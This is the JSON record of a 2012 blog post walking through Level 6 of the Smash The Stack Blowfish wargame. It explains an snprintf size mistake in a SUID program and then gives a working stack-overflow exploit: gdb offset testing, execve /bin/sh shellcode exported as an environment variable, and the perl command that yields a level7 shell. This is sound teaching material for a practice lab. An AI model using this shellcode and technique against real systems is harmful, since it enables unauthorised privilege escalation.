{"id":139,"date":"2012-07-30T15:20:24","date_gmt":"2012-07-30T22:20:24","guid":{"rendered":"http:\/\/seanmurphree.com\/blog\/?p=139"},"modified":"2012-07-31T01:55:03","modified_gmt":"2012-07-31T08:55:03","slug":"blowfish-level-6-typo-smash","status":"publish","type":"post","link":"https:\/\/seanmurphree.com\/blog\/?p=139","title":{"rendered":"Blowfish Level 6 – Typo Smash!"},"content":{"rendered":"

Welcome back. \u00a0Today we’re going to be looking at Level 6 of the Blowfish<\/a> wargame from Smash The Stack<\/a>. \u00a0As a reminder, the final password for the next level will the removed from this page and replaced with Y’s. \u00a0Let’s jump in.<\/p>\n

Let’s use the level 6 password we got from the end of level 5 and ssh into Blowfish. \u00a0Upon arrival, let’s get a listing of the files for this level:<\/p>\n

level6@blowfish:~$ ls \/levels | grep level6
\nlevel6
\nlevel6.c<\/p><\/blockquote>\n

As usual, a SUID executable binary and it’s source code. \u00a0Since we’ve been seeing quite a few buffer overflows recently, let’s go a head and start off by reading the source code:<\/p>\n

level6@blowfish:~$ more \/levels\/level6.c
\n#include <stdio.h>
\n#include <string.h><\/p>\n

int badfunc(char *string1, char *string2) {<\/p>\n

char buffer1[1024];
\nchar buffer2[1024];<\/p>\n

if(strlen(string1)>=sizeof(buffer1)) {
\nprintf(“\\n\\t(!) overflow detected.\\n”);
\nprintf(“\\t(-) exiting…\\n\\n”);
\nreturn -1;
\n}
\nelse {
\nprintf(“\\n\\t(+) copying string1 into the buffer…”);
\nsnprintf(buffer1,sizeof(buffer1),”%s”,string1);
\nprintf(“\\t\\t[done] (%d)\\n”, strlen(buffer1));
\n}<\/p>\n

if(strlen(string2)>=sizeof(buffer2)*3) {
\nprintf(“\\n\\t(!) overflow detected.\\n”);
\nprintf(“\\t(-) exiting…\\n\\n”);
\nreturn -1;
\n}
\nelse {
\nprintf(“\\t(+) copying string2 into the buffer…”);
\nsnprintf(buffer2,sizeof(buffer1)*3,”%s”,string2);
\nprintf(“\\t\\t[done] (%d)\\n\\n”, strlen(buffer2));
\n}<\/p>\n

return 0;
\n}<\/p>\n

int main(int argc, char *argv[]) {<\/p>\n

if(argc != 3)
\nreturn -1;<\/p>\n

badfunc(argv[2], argv[1]);<\/p>\n

return 0;
\n}<\/p><\/blockquote>\n

Looking at the main function we can see the program takes only two command line arguments, passes them to the function badfunc in switched order, aka badfunc(argv[2], argv[1]), then exits. \u00a0So let’s look at the badfunc function. \u00a0This function consists of two 1024 byte buffers, and what appears to be input checking code. \u00a0The first if statement checks if the first parameter is greater than the length of the first buffer and if so, exits. \u00a0If not, it copies the first parameter into the first buffer using snprintf. \u00a0The snprintf function is used safely here in that the max number of bytes to copy is specified and thus it won’t overflow the buffer. \u00a0However, if we look at the second if statement, we can see it’s slightly different. \u00a0The second statement checks if the length of the second parameter is greater than three times the size of the second buffer and if so, exits. \u00a0If not, it copies the second argument into the second buffer using snprintf. \u00a0In this case, the snprintf function takes three times the length of the first buffer as the maximum number of bytes which will be allowed to be copied. \u00a0Now, it may not be exactly clear why\u00a0<\/em>three times the buffer size is used in the second if\/else statements, however it does leave the program vulnerable to buffer overflow attacks.<\/p>\n

To get an idea for the size of our attack strings, let’s try to remember how memory is allocated on the call stack for a frame. \u00a0Memory grows down and get allocated for variables in the order in which they are encountered in the program. \u00a0Thus, we should have something along the lines of:<\/p>\n

\u00a0 \u00a01024B \u00a0 \u00a01024B \u00a0 \u00a0 \u00a04B \u00a0 \u00a0 \u00a0 4B \u00a0 \u00a0 4B \u00a0 4B<\/p>\n

[buffer2][buffer1][arg2][arg1][sfp][ra]<\/p><\/blockquote>\n

So, we’re going to need parameter two of the badfunc function to be the overflow string. \u00a0Looking back at main, that’s argv[1] which is the first command line argument. \u00a0To overflow, it’s going to need to fill buffer2, buffer1, arg2, arg1, sfp, and correctly position for writing on ra. \u00a0So that’s at least 1024 + 1024 + 4 + 4 + 4 = 2060 bytes to pad til the return address, and then we want to write 4 bytes on the return address. Let’s open up gdb and see if we can get our attack string figured out using perl.<\/p>\n

level6@blowfish:~$ gdb \/levels\/level6
\n…
\n(gdb) run `perl -e ‘print “A”x2060,”BBBB”‘` `perl -e ‘print “C”x1023’`
\nStarting program: \/levels\/level6 `perl -e ‘print “A”x2060,”BBBB”‘` `perl -e ‘print “C”x1023’`<\/p>\n

(+) copying string1 into the buffer… [done] (1023)
\n(+) copying string2 into the buffer… [done] (2064)
\nProgram received signal SIGSEGV, Segmentation fault.
\n0x42424242 in ?? ()
\n(gdb) quit<\/p><\/blockquote>\n

Oho! Perfectly calculated. \u00a0Look at that address, 0x42424242. \u00a0We overwrote the return address exactly with four B’s. \u00a0Now the last thing we need to do is load up some shellcode and put it’s memory location in our overflow string instead of B’s. \u00a0So let’s export some shellcode, with a small NOP padding at the beginning, into the environmental variable SHELLCODE:<\/p>\n

level6@blowfish:~$ export SHELLCODE=$’\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90
\n\\x90\\x90\\x31\\xdb\\x89\\xd8\\xb0\\x17\\xcd\\x80\\x31\\xdb
\n\\x89\\xd8\\xb0\\x2e\\xcd\\x80\\x31\\xc0\\x50\\x68\\x2f\\x2f
\n\\x73\\x68\\x68\\x2f\\x62\\x69\\x6e\\x89\\xe3\\x50\\x53\\x89
\n\\xe1\\x31\\xd2\\xb0\\x0b\\xcd\\x80′<\/p><\/blockquote>\n

Now let’s use our getenv C program to get the memory location of our SHELLCODE environmental variable:<\/p>\n

#include <stdio.h>
\n#include <stdlib.h><\/p>\n

int main(int argc, char *argv[])
\n{
\nif(!argv[1])
\nexit(1);
\nprintf(“%#x\\n”, getenv(argv[1]));
\nreturn 0;
\n}<\/p>\n

…<\/p>\n

level6@blowfish:\/tmp\/.t$ .\/getenv SHELLCODE
\n0xbfffda03<\/p><\/blockquote>\n

Alright! \u00a0Now we have our shellcode in memory with our NOP padding starting at location 0xbfffda03. \u00a0Now we just need to write that over the return address with our buffer overflow string and we should get a shell. \u00a0Let’s try:<\/p>\n

level6@blowfish:~$ \/levels\/level6 `perl -e ‘print “A”x2060,”\\x08\\xda\\xff\\xbf”‘` `perl -e ‘print “C”x1023’`<\/p>\n

(+) copying string1 into the buffer… [done] (1023)
\n(+) copying string2 into the buffer… [done] (2064)<\/p>\n

sh-3.2$ whoami
\nlevel7
\nsh-3.2$ more \/pass\/level7
\nYYYYYYYY<\/p><\/blockquote>\n

There we have it, a buffer overflow even with the use of a “safe” function. \u00a0Unfortunately, it’s only as safe as it’s programmed to be. \u00a0If the function had been used correctly, and the buffer size wasn’t multiplied, things wouldn’t have turned out like this.<\/p>\n","protected":false},"excerpt":{"rendered":"

Welcome back. \u00a0Today we’re going to be looking at Level 6 of the Blowfish wargame from Smash The Stack. \u00a0As a reminder, the final password for the next level will the removed from this page and replaced with Y’s. \u00a0Let’s … Continue reading →<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[16,6,4],"tags":[51,27,49,11,47],"_links":{"self":[{"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/posts\/139"}],"collection":[{"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=139"}],"version-history":[{"count":5,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/posts\/139\/revisions"}],"predecessor-version":[{"id":141,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=\/wp\/v2\/posts\/139\/revisions\/141"}],"wp:attachment":[{"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=139"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=139"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/seanmurphree.com\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=139"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}